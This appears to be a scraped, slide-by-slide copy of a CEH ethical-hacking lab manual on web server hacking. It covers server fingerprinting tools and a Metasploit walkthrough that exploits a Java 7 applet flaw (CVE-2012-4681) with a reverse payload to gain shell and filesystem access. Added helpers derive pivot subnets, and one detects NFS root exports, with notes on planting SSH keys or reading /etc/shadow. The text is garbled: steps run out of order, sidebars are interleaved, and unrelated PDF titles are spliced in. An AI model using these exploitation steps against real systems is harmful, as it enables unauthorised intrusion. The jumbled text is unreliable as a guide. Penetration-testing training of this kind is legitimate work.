A host scan identifies vulnerable systems within the target network range that you define. When you perform a scan, Metasploit Pro provides information about the services, vulnerabilities, and captured evidence for hosts that the scan discovers. Additionally, you can add vulnerabilities, notes, tags, and tokens to identified hosts.

30. To access the files of the target system, click Access Filesystem.

Bruteforce uses a large number of user name and password combinations to attempt to gain access to a host. Metasploit Pro provides preset bruteforce profiles that you can use to customize attacks for a specific environment. If you have a list of credentials that you want to use, you can import the credentials into the system.


FIGURE 3.27: Metasploit Accessing Filesystem of a Target Machine

31. You can view and modify the files from the target machine.



If a bruteforce is successful, Metasploit Pro opens a session on the target system. You can take control of the session through a command shell or Meterpreter session. If there is an open session, you can collect system data, access the remote file system, pivot attacks and traffic, and run post-exploitation modules.

Modules expose and exploit vulnerabilities and security flaws in target systems. Metasploit Pro offers access to a comprehensive library of exploit modules, auxiliary modules, and post-exploitation modules. You can run automated exploits or manual exploits.

Automated exploitation uses the minimum reliability option to determine the set of exploits to run against the target systems. You cannot select the modules or define evasion options that Metasploit Pro uses.


FIGURE 3.28: Metasploit Modifying Filesystem of a Target Machine

32. You can also launch a command shell on the target machine by clicking Command Shell from the captured sessions.

FIGURE 3.29: Metasploit Launching Command Shell of Target Machine

33. To view the system IP address and other information through the command shell in Metasploit, type ipconfig /all and press Enter. Note that at the Meterpreter > prompt this runs Meterpreter's own ipconfig command (the /all switch belongs to the Windows tool), which prints the per-interface listing shown in Figure 3.31: interface number, Name, Hardware MAC, MTU and addresses. To run the Windows ipconfig.exe itself, enter shell first to get a cmd.exe prompt.


Manual exploitation provides granular control over the exploits that you run against the target systems. You run one exploit at a time, and you can choose the modules and evasion options that you want to use.

FIGURE 3.30: Metasploit IPCONFIG command for Target Machine

Social engineering exploits client-side vulnerabilities. You perform social engineering through a campaign. A campaign uses e-mail to perform phishing attacks against target systems. To create a campaign, you must set up a web server, an e-mail account, a list of target e-mail addresses, and an e-mail template.

34. The following screenshot shows the IP address and other details of your target machine.
[Screenshot: Meterpreter ipconfig output listing the target's interfaces, among them a WAN Miniport (Network Monitor) adapter and a Microsoft ISATAP Adapter, each with Name, Hardware MAC, MTU and address fields, ending at the Meterpreter > prompt]

WebScan spiders web pages and applications for active content and forms. If WebScan identifies active content, you can audit the content for vulnerabilities, and then exploit the vulnerabilities after Metasploit Pro discovers them.


FIGURE 3.31: Metasploit Target Machine IP Address in Metasploit Command Shell

35. Click the Go back one page button in the Metasploit browser to exit the command shell.


A task chain is a series of tasks that you can automate to follow a specific schedule. The Metasploit Web UI provides an interface that you can use to set up a task chain and an interactive clock and calendar that you can use to define the schedule.

A report provides comprehensive results from a penetration test. Metasploit Pro provides several types of standard reports that range from high-level, general overviews to detailed report findings. You can generate a report in PDF, Word, XML, and HTML.

FIGURE 3.32: Metasploit closing command shell

FIGURE 3.33: Metasploit Terminating Session

You can use reports to compare findings between different tests or different systems. Reports provide details on compromised hosts, executed modules, cracked passwords, cracked SMB hashes, discovered SSH keys, discovered services, collected evidence, and web campaigns.

37. It will display Session Killed. Now, from the Account drop-down list, select Logout.

[Screenshot: Metasploit web UI (Overview, Analysis, Sessions, Campaigns, Web Apps, Modules, Tags, Reports, User Settings, Logout menu) showing the "Session killed" notice above the Active Sessions and Closed Sessions lists, with Logout selected from the Account menu]
FIGURE 3.34: Metasploit Session Killed and Logging out


Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: Metasploit Framework

Information Collected/Objectives Achieved:
Output: Interface Information
■ Name: eth14 - Microsoft Hyper-V Network Adapter
■ Hardware MAC: 00:00:00:00:00:00
■ MTU: 1500
■ IPv4 Address: 10.0.0.12
■ IPv4 Netmask: 255.255.255.0
■ IPv6 Address: fe80::b9ea:d011:3e0e:1b7
■ IPv6 Netmask: ffff:ffff:ffff:ffff:ffff::
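The interface information collected above is the text that Meterpreter's ipconfig prints. The following Ruby is an added example, not the lab manual's or Metasploit's own code: it parses that listing into records for the lab report and turns each routable IPv4 address into CIDR form, which is the subnet a pivot through this session (the "pivot attacks and traffic" the sidebar mentions) would be routed into. SAMPLE_IPCONFIG is constructed to mirror the lab's Hyper-V adapter plus a loopback interface; the Hyper-V adapter's MAC in the sample is invented.

```ruby
# Added example: parse Meterpreter `ipconfig` output into records for the lab
# report and derive the pivot subnet. Not code from the CEH manual or Metasploit.
require 'ipaddr'

# Constructed sample in the shape Meterpreter prints on a Windows target. The
# Hyper-V adapter values echo the Lab Analysis table (the MAC is invented);
# the loopback block is there to show the filtering step.
SAMPLE_IPCONFIG = <<~TXT
  Interface  1
  ============
  Name         : Software Loopback Interface 1
  Hardware MAC : 00:00:00:00:00:00
  MTU          : 4294967295
  IPv4 Address : 127.0.0.1
  IPv4 Netmask : 255.0.0.0
  IPv6 Address : ::1
  IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

  Interface 14
  ============
  Name         : Microsoft Hyper-V Network Adapter
  Hardware MAC : 00:15:5d:00:0c:12
  MTU          : 1500
  IPv4 Address : 10.0.0.12
  IPv4 Netmask : 255.255.255.0
  IPv6 Address : fe80::b9ea:d011:3e0e:1b7
  IPv6 Netmask : ffff:ffff:ffff:ffff::
TXT

# One hash per "Interface N" block; field names become symbols such as
# :name, :hardware_mac, :ipv4_address, :ipv4_netmask.
def parse_meterpreter_ipconfig(text)
  interfaces = []
  current = nil
  text.each_line do |raw|
    line = raw.strip
    if (m = line.match(/\AInterface\s+(\d+)\z/))
      current = { index: m[1].to_i }
      interfaces << current
    elsif current && (m = line.match(/\A([A-Za-z0-9 ]+?)\s*:\s*(.*)\z/))
      current[m[1].downcase.tr(' ', '_').to_sym] = m[2]
    end
  end
  interfaces
end

# Dotted IPv4 netmask -> prefix length (255.255.255.0 -> 24). Rejects masks
# that are not a run of 1-bits followed by 0-bits, which signals a mis-parse.
def netmask_to_prefix(mask)
  bits = mask.split('.').map(&:to_i).reduce(0) { |acc, octet| (acc << 8) | octet }
  ones = bits.to_s(2).count('1')
  expected = (0xffffffff << (32 - ones)) & 0xffffffff
  raise ArgumentError, "non-contiguous netmask #{mask}" unless bits == expected
  ones
end

# Interfaces worth putting in the report: skip loopback and anything without an
# IPv4 address, and give the address in CIDR form plus the subnet it exposes.
def report_entries(text)
  parse_meterpreter_ipconfig(text).each_with_object([]) do |iface, out|
    addr = iface[:ipv4_address]
    next if addr.nil? || addr.start_with?('127.')
    prefix = netmask_to_prefix(iface[:ipv4_netmask])
    network = IPAddr.new("#{addr}/#{prefix}").to_s   # IPAddr masks to the network address
    out << { index: iface[:index], name: iface[:name], mac: iface[:hardware_mac],
             cidr: "#{addr}/#{prefix}", pivot_subnet: "#{network}/#{prefix}" }
  end
end

if $PROGRAM_NAME == __FILE__
  report_entries(SAMPLE_IPCONFIG).each do |e|
    puts "Interface #{e[:index]} (#{e[:name]}, #{e[:mac]}): #{e[:cidr]} -> pivot via #{e[:pivot_subnet]}"
  end
end
```

Run as a script it prints one line per reportable interface; for the sample that is the Hyper-V adapter at 10.0.0.12/24, with 10.0.0.0/24 as the network a route through the session would cover. The contiguity check in netmask_to_prefix is there because a mangled netmask (a common copy-paste casualty) would otherwise yield a plausible but wrong prefix.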

Questions
1. How would you create an initial user account from a remote system?
2. Describe one or more vulnerabilities that Metasploit can exploit.

Internet Connection Required
□ Yes   ☑ No

Platform Supported
☑ Classroom   ☑ iLabs


MESH IPL 2024 REport_Wavemaker India.pdfMESH IPL 2024 REport_Wavemaker India.pdf
MESH IPL 2024 REport_Wavemaker India.pdf
 
Paris 2024 History-making Matildas team selected for Olympic Games.pdf
Paris 2024 History-making Matildas team selected for Olympic Games.pdfParis 2024 History-making Matildas team selected for Olympic Games.pdf
Paris 2024 History-making Matildas team selected for Olympic Games.pdf
 

Ceh v8 labs module 12 hacking webservers

  • 1. CEH Lab Manual: Hacking Web Servers, Module 12
  • 2. Module 12 - Hacking Webservers
    Hacking Web Servers
    A web server, which can be referred to as the hardware, the computer, or the software, is the computer application that helps to deliver content that can be accessed through the Internet.
    Icon key: Valuable information, Test your knowledge, Web exercise, Workbook review
    Lab Scenario
    Today, most online services are implemented as web applications. Online banking, web search engines, email applications, and social networks are just a few examples of such web services. Web content is generated in real time by a software application running at server-side. So hackers attack the web server to steal credential information, passwords, and business information by DoS (DDoS) attacks, SYN flood, ping flood, port scan, sniffing attacks, and social engineering attacks. In the area of web security, despite strong encryption on the browser-server channel, web users still have no assurance about what happens at the other end. We present a security application that augments web servers with trusted co-servers composed of high-assurance secure coprocessors, configured with a publicly known guardian program. Web users can then establish their authenticated, encrypted channels with a trusted co-server, which then can act as a trusted third party in the browser-server interaction.
    Systems are constantly being attacked, and IT security professionals need to be aware of common attacks on web server applications. Attackers use sniffers or protocol analyzers to capture and analyze packets. If data is sent across a network in clear text, an attacker can capture the data packets and use a sniffer to read the data. In other words, a sniffer can eavesdrop on electronic conversations. A popular sniffer is Wireshark; it is also used by administrators for legitimate purposes. One of the challenges for an attacker is to gain access to the network to capture the data. If attackers have physical access to a router or switch, they can connect the sniffer and capture all traffic going through the system. Strong physical security measures help mitigate this risk.
    As a penetration tester and ethical hacker of an organization, you must provide security to the company's web server. You must perform checks on the web server for vulnerabilities, misconfigurations, unpatched security flaws, and improper authentication with external systems.
    Lab Objectives
    The objective of this lab is to help students learn to detect unpatched security flaws, verbose error messages, and much more. The objective of this lab is to:
    ■ Footprint web servers
    ■ Crack remote passwords
    ■ Detect unpatched security flaws
    CEH Lab Manual Page 731. Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
  • 3. Lab Environment
    To carry out this lab, you need:
    ■ A computer running Windows Server 2012 as host machine
    ■ A computer running Windows Server 2008, Windows 8 and Windows 7 as a virtual machine
    ■ A web browser with Internet access
    ■ Administrative privileges to run tools
    Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers
    Lab Duration
    Time: 40 Minutes
    Overview of Web Servers
    A web server, which can be referred to as the hardware, the computer, or the software, is the computer application that helps to deliver content that can be accessed through the Internet. Most people think a web server is just the hardware computer, but a web server is also the software application that is installed on the hardware computer. The primary function of a web server is to deliver web pages on request to clients using the Hypertext Transfer Protocol (HTTP). This means delivery of HTML documents and any additional content that may be included by a document, such as images, style sheets, and scripts. Many generic web servers also support server-side scripting using Active Server Pages (ASP), PHP, or other scripting languages. This means that the behavior of the web server can be scripted in separate files, while the actual server software remains unchanged.
    Web servers are not always used for serving the World Wide Web. They can also be found embedded in devices such as printers, routers, and webcams, serving only a local network. The web server may then be used as a part of a system for monitoring and/or administering the device in question. This usually means that no additional software has to be installed on the client computer, since only a web browser is required.
    Lab Tasks
    Recommended labs to demonstrate web server hacking:
    ■ Footprinting a web server using the httprecon tool
    ■ Footprinting a web server using the ID Serve tool
    ■ Exploiting Java vulnerabilities using Metasploit Framework
  • 4. Lab Analysis
    Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.
    PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
  • 5. Lab 1: Footprinting a Webserver Using the httprecon Tool
    The httprecon project undertakes research in the field of web server fingerprinting, also known as http fingerprinting.
    Icon key: Valuable information, Test your knowledge, Web exercise, Workbook review
    Lab Scenario
    Web applications are the most important ways for an organization to publish information, interact with Internet users, and establish an e-commerce/e-government presence. However, if an organization is not rigorous in configuring and operating its public website, it may be vulnerable to a variety of security threats. Although the threats in cyberspace remain largely the same as in the physical world (e.g., fraud, theft, vandalism, and terrorism), they are far more dangerous as a result. Organizations can face monetary losses, damage to reputation, or legal action if an intruder successfully violates the confidentiality of their data. DoS attacks are easy for attackers to attempt because of the number of possible attack vectors, the variety of automated tools available, and the low skill level needed to use the tools. DoS attacks, as well as threats of initiating DoS attacks, are also increasingly being used to blackmail organizations.
    In order to be an expert ethical hacker and penetration tester, you must understand how to perform footprinting on web servers.
    Lab Objectives
    The objective of this lab is to help students learn to footprint web servers. It will teach you how to:
    ■ Use the httprecon tool
    ■ Get a web server footprint
    Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers
    Lab Environment
    To carry out the lab, you need:
    ■ httprecon tool located at D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers\Webserver Footprinting Tools\httprecon
  • 6. ■ You can also download the latest version of httprecon from the link http://www.computec.ch/projekte/httprecon
    ■ If you decide to download the latest version, then screenshots shown in the lab might differ
    ■ Run this tool in Windows Server 2012
    ■ A web browser with Internet access
    ■ Administrative privileges to run tools
    Httprecon is an open-source application that can fingerprint web server applications.
    Lab Duration
    Time: 10 Minutes
    Overview of httprecon
    httprecon is a tool for advanced web server fingerprinting, similar to httprint. The httprecon project does research in the field of web server fingerprinting, also known as http fingerprinting. The goal is highly accurate identification of given httpd implementations.
    Lab Tasks
    Task 1: Footprinting a Webserver
    1. Navigate to D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers\Webserver Footprinting Tools\httprecon.
    2. Double-click httprecon.exe to launch httprecon.
    3. The main window of httprecon appears, as shown in the following figure.
    Httprecon is distributed as a ZIP file containing the binary and fingerprint databases.
    FIGURE 1.1: httprecon main window (Target field with port 80, request tabs GET existing, GET long request, GET non-existing, GET wrong protocol, HEAD existing and OPTIONS common, and the Full Matchlist, Fingerprint Details and Report Preview panes)
  • 7. 4. Enter the website (URL) www.juggyboy.com that you want to footprint and select the port number.
    5. Click Analyze to start analyzing the entered website.
    6. You should receive a footprint of the entered website.
    Httprecon uses a simple database per test case that contains all the fingerprint elements to determine the given implementation.
    FIGURE 1.2: The footprint result of the entered website (http://juggyboy.com:80/ identified as Microsoft IIS 6.0; the GET existing response is HTTP/1.1 200 OK with Content-Type: text/html, Content-Location: http://juggyboy.com/index.html, Server: Microsoft-IIS/6.0 and X-Powered-By: ASP.NET; the Matchlist of 352 implementations ranks Microsoft IIS 6.0 first with 88 hits and a 100% match, followed by Microsoft IIS 5.0, Microsoft IIS 5.1, Sun ONE Web Server, Apache 1.3.26, Zeus 4.3, Apache 1.3.37 and Microsoft IIS 7.0)
    The scan engine of httprecon uses nine different requests, which are sent to the target web server.
    7. Click the GET long request tab, which lists the GET request. Then click Fingerprint Details.
    Httprecon does not rely on simple banner announcements by the analyzed software.
    FIGURE 1.3: The fingerprint and GET long request result of the entered website (the response is HTTP/1.1 400 Bad Request with Content-Type, Date, Connection and Content-Length headers; Fingerprint Details lists Protocol HTTP, Version 1.1, Statuscode 400, Statustext, Banner, X-Powered-By, Header Spaces 1, Capital after Dash 1, and Header-Order Content-Type,Date,Connection,Content-Length)
  • 8. Lab Analysis
    Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.
    PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
    Tool/Utility: httprecon Tool
    Information Collected/Objectives Achieved: Output: Footprint of the juggyboy website
    ■ Content-Location: http://juggyboy.com/index.html
    ■ Content-Type: text/html
    ■ ETag: "a47ee9091e0cd1:7a49"
    ■ Server: Microsoft-IIS/6.0
    ■ X-Powered-By: ASP.NET
    Questions
    1. Analyze the major differences between classic banner-grabbing of the server line and httprecon.
    2. Evaluate the type of test requests sent by httprecon to web servers.
    Internet Connection Required: ☑ Yes ☐ No
    Platform Supported: ☑ Classroom ☐ iLabs
  • 9. Lab 2: Footprinting a Webserver Using ID Serve
    ID Serve is a simple, free, small (26 Kbytes), and fast general-purpose Internet server identification utility.
    Icon key: Valuable information, Test your knowledge, Web exercise, Workbook review
    Lab Scenario
    In the previous lab you learned to use the httprecon tool. httprecon is a tool for advanced web server fingerprinting, similar to httprint. It is very important for penetration testers to be familiar with banner-grabbing techniques to monitor servers to ensure compliance and appropriate security updates. Using this technique you can also locate rogue servers or determine the role of servers within a network. In this lab you will learn the banner grabbing technique to determine a remote target system using ID Serve.
    In order to be an expert ethical hacker and penetration tester, you must understand how to footprint a web server.
    Lab Objectives
    This lab will show you how to footprint web servers and how to use ID Serve. It will teach you how to:
    ■ Use the ID Serve tool
    ■ Get a web server footprint
    Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers
    Lab Environment
    To carry out the lab, you need:
    ■ ID Serve located at D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers\Webserver Footprinting Tools\ID Serve
    ■ You can also download the latest version of ID Serve from the link http://www.grc.com/id/idserve.htm
    ■ If you decide to download the latest version, then screenshots shown in the lab might differ
  • 10. ■ Run this tool on Windows Server 2012 as host machine
    ■ A web browser with Internet access
    ■ Administrative privileges to run tools
    Lab Duration
    Time: 10 Minutes
    ID Serve is a simple, free, small (26 Kbytes), and fast general-purpose Internet server identification utility.
    Overview of ID Serve
    ID Serve attempts to determine the domain name associated with an IP. This process is known as a reverse DNS lookup and is handy when checking firewall logs or receiving an IP address from someone. Not all IPs that have a forward direction lookup (Domain-to-IP) have a reverse (IP-to-Domain) lookup, but many do.
    Lab Tasks
    Task 1: Footprinting a Webserver
    1. In Windows Server 2012, navigate to D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers\Webserver Footprinting Tools\ID Serve.
    2. Double-click idserve.exe to launch ID Serve.
    3. The main window appears. Click the Server Query tab as shown in the following figure.
    FIGURE 2.1: Welcome screen of ID Serve (Internet Server Identification Utility v1.02, Personal Security Freeware by Steve Gibson, Copyright (c) 2003 by Gibson Research Corp.; tabs Background, Server Query and Q&A/Help; field 1 "Enter or copy / paste an Internet server URL or IP address here", button 2 "Query The Server", and panes for "Server query processing" and "The server identified itself as")
    ID Serve can connect to any server port on any domain or IP address.
    4. In option 1, enter (or copy/paste an Internet server URL or IP address) the website (URL) you want to footprint.
    5. Enter http://10.0.0.2/realhome (the IP address is where the real home site is hosted) in step 1.
  • 11. 6. Click Query the Server to start querying the entered website.
    7. After the completion of the query, ID Serve displays the results of the entered website as shown in the following figure.
    ID Serve uses the standard Windows TCP protocol when attempting to connect to a remote server and port.
    ID Serve can almost always identify the make, model, and version of any web site's server software.
    FIGURE 2.2: ID Serve detecting the footprint (query of http://10.0.0.2/realhome; the server query processing pane shows HTTP/1.1 200 OK with Content-Type, Last-Modified, Accept-Ranges and ETag headers)
    Lab Analysis
    Document all the server information.
    PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
    Tool/Utility: ID Serve
    Information Collected/Objectives Achieved:
    Server Identified: Microsoft-IIS/8.0
    Server Query Processing:
    ■ HTTP/1.1 200 OK
    ■ Content-Type: text/html
    ■ Last-Modified: Tue, 07 Aug 2012 06:05:46 GMT
    ■ Accept-Ranges: bytes
    ■ ETag: "c95dc4af6274cd1:0"
  • 12. Questions
    1. Analyze how ID Serve determines a site's web server.
    2. What happens if we enter an IP address instead of a URL?
    Internet Connection Required: ☐ Yes ☑ No
    Platform Supported: ☑ Classroom ☑ iLabs
  • 13. Lab 3: Exploiting Java Vulnerability Using Metasploit Framework
    Metasploit software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments.
    Icon key: Valuable information, Test your knowledge, Web exercise, Workbook review
    Lab Scenario
    Penetration testing is a method of evaluating the security of a computer system or network by simulating an attack from malicious outsiders (who do not have an authorized means of accessing the organization's systems) and malicious insiders (who have some level of authorized access). The process involves an active analysis of the system for any potential vulnerabilities that could result from poor or improper system configuration, either known and unknown hardware or software flaws, or operational weaknesses in process or technical countermeasures. This analysis is carried out from the position of a potential attacker and can involve active exploitation of security vulnerabilities.
    The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known subproject is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important subprojects include the Opcode Database, shellcode archive, and security research. Metasploit Framework is one of the main tools for every penetration test engagement.
    To be an expert ethical hacker and penetration tester, you must have a sound understanding of Metasploit Framework, its various modules, exploits, payloads, and commands in order to perform a pentest of a target.
    Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers
    Lab Objectives
    The objective of this lab is to demonstrate exploitation of JDK vulnerabilities to take control of a target machine.
    Lab Environment
    In this lab, you need:
  • 14. ■ Metasploit located at D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers\Webserver Attack Tools\Metasploit
    ■ You can also download the latest version of Metasploit Framework from the link http://www.metasploit.com/download/
    ■ If you decide to download the latest version, then screenshots shown in the lab might differ
    ■ A computer running Windows Server 2012 as host machine
    ■ Windows 8 running on a virtual machine as target machine
    ■ A web browser and Microsoft .NET Framework 2.0 or later on both host and target machine
    ■ JRE 7u6 running on the target machine (remove any other version of JRE installed on the target machine). The JRE 7u6 setup file (jre-7u6-windows-i586.exe) is available at D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers\Webserver Attack Tools\Metasploit
    ■ You can also download the JRE 7u6 setup file at http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1637588.html
    ■ Double-click metasploit-latest-windows-installer.exe and follow the wizard-driven installation steps to install Metasploit Framework
    Time: 20 Minutes
    Overview of the Lab
    This lab demonstrates the exploit that takes advantage of two issues in JDK 7: the ClassFinder and MethodFinder.findMethod(). Both were newly introduced in JDK 7. ClassFinder is a replacement for classForName back in JDK 6. It allows untrusted code to obtain a reference and have access to a restricted package in JDK 7, which can be used to abuse sun.awt.SunToolkit (a restricted package). With sun.awt.SunToolkit, we can actually invoke getField() by abusing findMethod() in Statement.invokeInternal() (but getField() must be public, and that's not always the case in JDK 6). In order to access Statement.acc's private field, modify
    Task 1: Installing Metasploit Framework
    1. Install Metasploit on the host machine Windows Server 2012.
    2. After installation completes, it will automatically open in your default web browser as shown in the following figure.
    3. Click I Understand the Risks to continue.
FIGURE 3.1: Metasploit Untrusted connection in web browser

4. Click Add Exception.

FIGURE 3.2: Metasploit Adding Exceptions

5. In the Add Security Exception wizard, click Confirm Security Exception.
Firefox warns that you are about to override how it identifies this site and that legitimate banks, stores, and other public sites will not ask you to do this; the Certificate Status it reports is Unknown Identity (the certificate is not trusted because it has not been verified by a recognized authority using a secure signature). The exception you confirm therefore applies only to the local Metasploit web interface in this lab.

FIGURE 3.3: Metasploit Add Security Exception

6. On the Metasploit - Setup and Configuration Login screen, enter text in the Username, Password, and Password confirmation fields and click Create Account.

The module's authors report that the exploit has been tested successfully against multiple platforms, including IE, Firefox, Safari and Chrome on Windows, Ubuntu, OS X and Solaris.

FIGURE 3.4: Metasploit Creating an Account

TASK 2: Product Key Activation

7. Click GET PRODUCT KEY in the Metasploit - Activate Metasploit window.
Oracle's Security Alert for CVE-2012-4681 (US-CERT Alert TA12-240A and Vulnerability Note VU#636312) addresses that issue and two other vulnerabilities affecting Java running in web browsers on desktops. These vulnerabilities are not applicable to Java running on servers or to standalone Java desktop applications, and they do not affect Oracle server-based software. They may be remotely exploitable without authentication, i.e., they may be exploited over a network without the need for a username and password.

8. Enter your valid email address in the Metasploit Community option and click GO.

FIGURE 3.6: Metasploit Community version for License Key

9. Now log in to your email account and copy the license key as shown in the following figure.
To be successfully exploited, an unsuspecting user running an affected release in a browser will need to visit a malicious web page that leverages this vulnerability. Successful exploits can impact the availability, integrity, and confidentiality of the user's system. Due to the severity of these vulnerabilities, the public disclosure of technical details and the reported exploitation of CVE-2012-4681 "in the wild," Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible.

FIGURE 3.7: Metasploit License Key in the email ID you provided (the Community Edition license is valid for one year; when it runs out, apply for a new license using the same registration mechanism)

10. Paste the product key and click Next to continue.

The Metasploit Framework will always be free and open source. The Metasploit Project and Rapid7 are fully committed to supporting and growing the Metasploit Framework as well as providing advanced solutions for users who need an alternative to developing their own penetration testing tools.

FIGURE 3.8: Metasploit Activating using License Key

11. Click Activate License to activate the Metasploit license.
FIGURE 3.9: Metasploit Activation

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download from SourceForge.net and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMware, VirtualBox, and other common virtualization platforms.

12. The Activation Successful window appears.

FIGURE 3.10: Metasploit Activation Successful

TASK 3: Updating Metasploit

13. Go to Administration and click Software Updates.

FIGURE 3.11: Metasploit Updating Software

14. Click Check for Updates, and after the check for updates completes, click Install.
By default, Metasploitable's network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network. (Note: A video tutorial on installing Metasploitable 2 is available at the link "Tutorial on installing Metasploitable 2.0 on a Virtual Box Host Only network".)

FIGURE 3.12: Metasploit Checking for Updates

15. After completing the updates it will ask you to restart, so click Restart.

The Metasploitable 2 documentation outlines many of the security flaws in the Metasploitable 2 image. Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. That document will continue to expand over time as many of the less obvious flaws with this platform are detailed.

16. Wait until Metasploit restarts.
TCP ports 512, 513, and 514 are known as "r" services, and on Metasploitable 2 they have been misconfigured to allow remote access from any host (a standard ".rhosts + +" situation). To take advantage of this, make sure the rsh-client package is installed (on Ubuntu) and run the r-service client as your local root user. If you are prompted for an SSH key, this means the rsh-client tools have not been installed and Ubuntu is defaulting to using SSH.

If you have just finished installing or restarting Metasploit, the application can take up to 5 minutes to initialize. This is normal; the web interface retries its request every 5 seconds until the Metasploit services are available again.

FIGURE 3.14: Metasploit Restarts

17. After the restart completes it will redirect to Metasploit - Home. Now click Create New Project from the Project drop-down list.
TASK 4: Creating a New Metasploit Project

This is about as easy as it gets. The next service to look at on Metasploitable 2 is the Network File System (NFS). NFS can be identified by probing port 2049 directly or by asking the portmapper for a list of services. Using rpcinfo to identify NFS and showmount -e to list the exports shows that the "/" share (the root of the file system) is being exported.

FIGURE 3.15: Metasploit Creating a New Project

18. In Project Settings, provide the Project Name and enter a Description, leave the Network Range set to its default, and click Create Project.
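The rpcinfo/showmount check that the Metasploitable 2 note above refers to, written out as an added POSIX shell example; it is not part of the lab manual or of the Metasploitable 2 documentation. The two parsers read the text that rpcinfo -p and showmount -e print, the live check_nfs_host helper assumes both tools are installed, and the sample outputs embedded at the bottom are constructed (192.0.2.10 is a documentation address, not a captured host).

```shell
#!/bin/sh
# Added example (not from the lab manual): flag the two findings the
# Metasploitable 2 note describes, NFS registered with the portmapper and
# "/" exported to every host. The parsers consume the text that
# `rpcinfo -p <host>` and `showmount -e <host>` print.

# Reads rpcinfo -p output on stdin; returns 0 if the NFS program
# (RPC program number 100003) is registered, 1 otherwise.
rpcinfo_has_nfs() {
    awk '$1 == "100003" { found = 1 } END { exit found ? 0 : 1 }'
}

# Reads showmount -e output on stdin; returns 0 if "/" is exported to "*"
# (every client), 1 otherwise. Export lines look like:  "/   *"
exports_root_to_everyone() {
    awk '$1 == "/" && $2 == "*" { hit = 1 } END { exit hit ? 0 : 1 }'
}

# Live check against one host. Assumes rpcinfo and showmount are installed;
# it is only defined here, never called, so the file can be sourced safely.
check_nfs_host() {
    host=$1
    if rpcinfo -p "$host" 2>/dev/null | rpcinfo_has_nfs; then
        echo "[*] $host: NFS (program 100003) is registered with the portmapper"
        if showmount -e "$host" 2>/dev/null | exports_root_to_everyone; then
            echo "[!] $host: the root of the file system (/) is exported to everyone"
            return 0
        fi
        echo "[-] $host: NFS present, but / is not exported to *"
    fi
    return 1
}

# Constructed sample outputs (not captured from a real host; 192.0.2.10 is
# a documentation address) in the format the two tools print.
SAMPLE_RPCINFO='   program vers proto   port
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100003    2   udp   2049  nfs
    100003    3   tcp   2049  nfs
    100005    1   udp  34297  mountd'
SAMPLE_SHOWMOUNT='Export list for 192.0.2.10:
/ *'

# Runs both parsers over the constructed samples; returns 0 when they agree
# that the sample host exports / to everyone.
sample_nfs_root_export_finding() {
    printf '%s\n' "$SAMPLE_RPCINFO" | rpcinfo_has_nfs &&
    printf '%s\n' "$SAMPLE_SHOWMOUNT" | exports_root_to_everyone
}
```

On a real engagement you would call check_nfs_host with the target address; a "/" export to "*" means any client can mount the whole file system read/write and plant an SSH key or read /etc/shadow, which is why the note singles it out.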
The Metasploit Framework is a penetration testing system and development platform that you can use to create security tools and exploits. The Metasploit Framework is written in Ruby and includes components in C and assembler. It consists of tools, libraries, modules, and user interfaces. The basic function of the Metasploit Framework is a module launcher that allows the user to configure an exploit module and launch the exploit against a target system.

FIGURE 3.16: Metasploit Project Settings

19. Click the Modules tab after the project is created.

FIGURE 3.17: Metasploit Modules Tab

TASK 5: Running the Exploit

20. Enter the CVE ID (2012-4681) in Search Modules and press Enter.
Metasploit Pro contains tasks, such as bruteforce and discovery, in the form of modules. The modules automate the functionality that the Metasploit Framework provides and enable you to perform multiple tasks simultaneously. A project is the logical component that provides the intelligent defaults, penetration testing workflow, and module-specific guidance during the penetration test.

FIGURE 3.18: Metasploit Searching for Java Exploit

21. Click the Java 7 Applet Remote Code Execution link.

In addition to the capabilities offered by the open source framework, Metasploit Pro delivers a full graphical user interface, automated exploitation capabilities, complete user action audit logs, and custom reporting, combined with an advanced penetration testing workflow.

FIGURE 3.19: Metasploit Java 7 Applet Remote Code Execution Exploit found

22. Configure the exploit settings:
a. In Payload Options set the Connection Type as Reverse and in Listener Host, enter the IP address where Metasploit is running.
b. In Module Options, enter the SRVHOST IP address where Metasploit is running.
c. Enter the URI Path (in this lab we are using greetings) and click Run Module.
